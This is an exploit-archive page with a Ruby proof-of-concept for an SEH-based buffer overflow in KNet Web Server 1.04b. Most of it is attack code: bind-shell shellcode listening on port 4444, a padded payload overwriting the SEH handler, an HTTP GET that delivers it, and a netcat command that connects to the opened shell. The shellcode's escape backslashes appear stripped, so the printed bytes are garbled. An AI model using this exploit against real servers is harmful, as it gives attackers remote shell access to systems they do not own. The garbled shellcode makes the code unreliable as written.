KNet Web Server 1.04b - Buffer Overflow SEH

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : KNet Web Server 1.04b - Buffer Overflow SEH
# Published : 2013-03-29
# Author :
# Previous Title : Cool PDF Image Stream Buffer Overflow
# Next Title : STUNSHELL Web Shell Remote PHP Code Execution

#!/usr/bin/ruby

# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b 
# Tested on: Windows 7

require 'net/http'
require 'uri'
require 'socket'
############################################

# bind port 4444
sc_bind = 
"xbdx0ex27x05xabxdaxdbxd9x74x24xf4x5ax33xc9" +
"xb1x56x83xc2x04x31x6ax0fx03x6ax01xc5xf0x57" +
"xf5x80xfbxa7x05xf3x72x42x34x21xe0x06x64xf5" +
"x62x4ax84x7ex26x7fx1fxf2xefx70xa8xb9xc9xbf" +
"x29x0cxd6x6cxe9x0exaax6ex3dxf1x93xa0x30xf0" +
"xd4xddxbaxa0x8dxaax68x55xb9xefxb0x54x6dx64" +
"x88x2ex08xbbx7cx85x13xecx2cx92x5cx14x47xfc" +
"x7cx25x84x1ex40x6cxa1xd5x32x6fx63x24xbax41" +
"x4bxebx85x6dx46xf5xc2x4axb8x80x38xa9x45x93" +
"xfaxd3x91x16x1fx73x52x80xfbx85xb7x57x8fx8a" +
"x7cx13xd7x8ex83xf0x63xaax08xf7xa3x3ax4axdc" +
"x67x66x09x7dx31xc2xfcx82x21xaaxa1x26x29x59" +
"xb6x51x70x36x7bx6cx8bxc6x13xe7xf8xf4xbcx53" +
"x97xb4x35x7ax60xbax6cx3axfex45x8ex3bxd6x81" +
"xdax6bx40x23x62xe0x90xccxb7xa7xc0x62x67x08" +
"xb1xc2xd7xe0xdbxccx08x10xe4x06x3fx16x2ax72" +
"x6cxf1x4fx84x83x5dxd9x62xc9x4dx8fx3dx65xac" +
"xf4xf5x12xcfxdexa9x8bx47x56xa4x0bx67x67xe2" +
"x38xc4xcfx65xcax06xd4x94xcdx02x7cxdexf6xc5" +
"xf6x8exb5x74x06x9bx2dx14x95x40xadx53x86xde" +
"xfax34x78x17x6exa9x23x81x8cx30xb5xeax14xef" +
"x06xf4x95x62x32xd2x85xbaxbbx5exf1x12xeax08" +
"xafxd4x44xfbx19x8fx3bx55xcdx56x70x66x8bx56" +
"x5dx10x73xe6x08x65x8cxc7xdcx61xf5x35x7dx8d" +
"x2cxfex8dxc4x6cx57x06x81xe5xe5x4bx32xd0x2a" +
"x72xb1xd0xd2x81xa9x91xd7xcex6dx4axaax5fx18" +
"x6cx19x5fx09"

###########################################


sploit = "x90" * 1234
sploit += "xFFx64x24x5C"  # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code  at ESP+5C
sploit += "xE3x74x24x6C"  # seh  | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "x90" * 80  

sploit += sc_bind
sploit += "x90" * 80

########################################

puts "KNet Web Server - Buffer Overflow SEH Exploitrn by Myo Soe, http://yehg.net/nn"
target = ARGV[0]

def exploit(t,s)
	target = 'http://' + t
	sploit = s
	puts "[*] Sending exploit to #{target}...n"
	url = URI.parse(target)
	res = Net::HTTP.start(url.host, url.port) {|http|
	http.get('/' + sploit)
	}
end 
def connect(t)
	sleep(1)
	target = t
	puts "[*] Opening Shell ..nn";
	system("nc #{target} 4444")
end 
t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join